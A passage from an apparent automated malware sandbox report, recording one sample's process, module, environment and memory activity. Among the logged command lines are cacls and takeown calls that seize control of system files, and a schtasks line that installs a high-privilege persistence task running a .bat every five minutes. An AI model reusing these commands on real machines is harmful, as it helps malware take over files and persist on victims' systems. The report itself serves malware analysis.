| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xdf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xde8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "MSPVWCTL.DLL.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "MSPVWCTL.DLL.mui" |
|
1 |
Process #111: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #111 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Portable Devices\restaurant.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:45, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xff0 |
| Parent PID | 0x974 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE0
0x
F9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001e0000 | 0x001e0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00201fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00203fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00223fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x003e0000 | 0x003e1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x007a0000 | 0x00ad6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f8e0000 | 0x7f8e0000 | 0x7f9dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f9e0000 | 0x7f9e0000 | 0x7fa02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa06000 | 0x7fa06000 | 0x7fa06fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa09000 | 0x7fa09000 | 0x7fa09fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa0a000 | 0x7fa0a000 | 0x7fa0cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa0d000 | 0x7fa0d000 | 0x7fa0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #112: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #112 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\expenditurevincenttablet.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:45, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfc4 |
| Parent PID | 0xf4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FB4
0x
C94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000d40000 | 0x00d40000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00d4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00d53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d63fff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000004d80000 | 0x04d80000 | 0x04d93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04e23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e30000 | 0x04e30000 | 0x04e30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04e90000 | 0x04e91fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x0512ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ec0000 | 0x04f7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0512ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x0531ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05320000 | 0x05656fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fbd0000 | 0x7fbd0000 | 0x7fccffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fcd0000 | 0x7fcd0000 | 0x7fcf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fcf8000 | 0x7fcf8000 | 0x7fcfafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fcfb000 | 0x7fcfb000 | 0x7fcfbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fcfc000 | 0x7fcfc000 | 0x7fcfefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fcff000 | 0x7fcff000 | 0x7fcfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #113: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #113 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:43, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x828 |
| Parent PID | 0xf04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3D0
0x
DE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ec0000 | 0x00ec0000 | 0x04ebffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04edffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ec0000 | 0x04ec0000 | 0x04ecffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04ed3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04ee0000 | 0x04ee4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004ef0000 | 0x04ef0000 | 0x04f03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f90000 | 0x04f90000 | 0x04f93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004fa0000 | 0x04fa0000 | 0x04fa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x04fb1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04fc0000 | 0x0507dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x05100000 | 0x05129fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x05100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x05110fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051a0000 | 0x051a0000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x053dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053e0000 | 0x053e0000 | 0x055cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000053e0000 | 0x053e0000 | 0x05567fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000055c0000 | 0x055c0000 | 0x055cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000055d0000 | 0x055d0000 | 0x05750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005760000 | 0x05760000 | 0x06b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06b60000 | 0x06e96fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e720000 | 0x7e720000 | 0x7e81ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e820000 | 0x7e820000 | 0x7e842fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e848000 | 0x7e848000 | 0x7e84afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e84b000 | 0x7e84b000 | 0x7e84dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e84e000 | 0x7e84e000 | 0x7e84efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e84f000 | 0x7e84f000 | 0x7e84ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #114: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #114 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:41, Reason: Child Process |
| Unmonitor | End Time: 00:04:46, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdf4 |
| Parent PID | 0xdfc (c:\windows\syswow64\reg.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BF0
0x
DF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000006f0000 | 0x006f0000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x00703fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00711fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00713fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00733fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x007f0000 | 0x008adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x008f0000 | 0x008f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04d80000 | 0x050b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee20000 | 0x7ee20000 | 0x7ef1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef20000 | 0x7ef20000 | 0x7ef42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef45000 | 0x7ef45000 | 0x7ef45fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef49000 | 0x7ef49000 | 0x7ef4bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef4c000 | 0x7ef4c000 | 0x7ef4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef4f000 | 0x7ef4f000 | 0x7ef4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #115: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #115 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\cKJ5Qstc.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:43, Reason: Child Process |
| Unmonitor | End Time: 00:04:54, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdf0 |
| Parent PID | 0xe2c (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B34
0x
978
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000030000 | 0x00030000 | 0x0004ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x0003ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00043fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00051fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00073fff | Pagefile Backed Memory | r |
|
|
|
- |
